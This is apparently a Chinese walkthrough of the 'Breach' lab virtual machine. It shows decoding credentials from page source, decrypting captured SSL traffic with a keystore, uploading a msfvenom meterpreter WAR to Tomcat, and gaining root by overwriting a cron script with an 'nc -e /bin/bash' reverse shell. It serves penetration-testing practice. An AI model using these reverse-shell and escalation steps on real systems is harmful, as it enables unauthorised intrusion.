Breach 渗透测试

Breach 渗透测试

0x00实验环境

靶机：breach，IP地址：192.168.110.140

测试机：Kali，IP地址：192.168.110.6；

0x01实验流程

信息收集——主机发现、端口扫描

渗透测试

0x02实验步骤

1. 主机发现

1. masscan --rate=100000 -p 0-65535 192.168.110.140 发现未扫描出有效信息
2. 访问web端

查看主页源码发现一串加密字符

Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo

解密得：

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

再次解密：

pgibbons:damnitfeel$goodtobeagang$ta

这应当是登录用户名密码

尝试登录

成功登录后台

1. 发现有三封邮件并逐个查看

 

发现

发现192.168.110.140/.keystore

keystore是存储公私密钥的一种文件格式

下载该密钥文件

然后浏览账户

点击content

发现一个流量包并下载

1. 使用wireshark打开该流量包

无法直接打开，应该是被加密

查看keystore中的密钥

 

查看密钥库文件信息：

指令：keytool -list -v -keystore 密钥库文件名 -storepass 密钥库密码

安装jdk1.8并执行keytool

导出密钥

keytool -importkeystore -srckeystore /root/Downloads/keystore -destkeystore /root/Downloads/tomcat.p12 -deststoretype PKCS12 -srcalias tomcat

将.p12证书导入Wireshark

打开数据包

查看数据包

解密该字段

又一个登录用户名密码

tomcat:Tt\5D8F(#!*u=G)4m7zB

注意，较新版本的浏览器会显示不安全连接

需要旧版本的才可以访问该url

1. 上传jsp一句话木马，打包压缩并更改压缩包后缀为war

但是一会儿木马就被删除了，可能是由杀软，重新生成并上传木马

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.6  lport=4444 -f war -o ba.war

生成war格式的反弹shell

Msf开启监听

Tomcat后台上传ba.war

访问ba，获得反弹shell

1. 接下来，提权

在/var/www/5446目录下发现可疑文件

查看文件

这是mysql的连接数据，密码为空

连接mysql

得到用户名密码

milton           | 6450d89bd3aff1d893b85d3ad65d2ec2

debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878

解密得到

Milton ：  thelaststraw

切换用户milton

发现一个blumbergh用户

1. 查看网站图片

下载至kali

使用strings打印各图片其中的可打印字符

strings my_badge.jpg >> image.txt未有有价值信息

同样操作其他图片

得到

coffeestains

1. 尝试登录blumbergh

登录成功

查看该用户下root权限命令

tee - 重定向输出到多个文件

tee [-ai][–help][–version][文件…]
参数：
-a或–append 　附加到既有文件的后面，而非覆盖它．
-i或–ignore-interrupts 　忽略中断信号。
–help 　在线帮助。
–version 　显示版本信息。

   

无法使用tee向/etc/passwd中写入信息

尝试tidyup.sh

这个脚本是定时清理脚本

而且只有root有写的权限

先写一个nc反弹脚本

echo "nc -e /bin/bash 192.168.110.220 5555" > shell.txt

再将该脚本用tee写入tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

Kali监听等待得到root权限的shell

1. 清理痕迹，留后门

 

总结：

1. 从网页源码中解密出CMS账号密码
2. 导入ssl证书到Wireshark中解密经过SSL加密的http流量，获得Tomcat后台登录URL和账号密码
3. Tomcat后台get shell
4. 提权时套注意当前用户目录下的文件以及其可以执行的root权限命令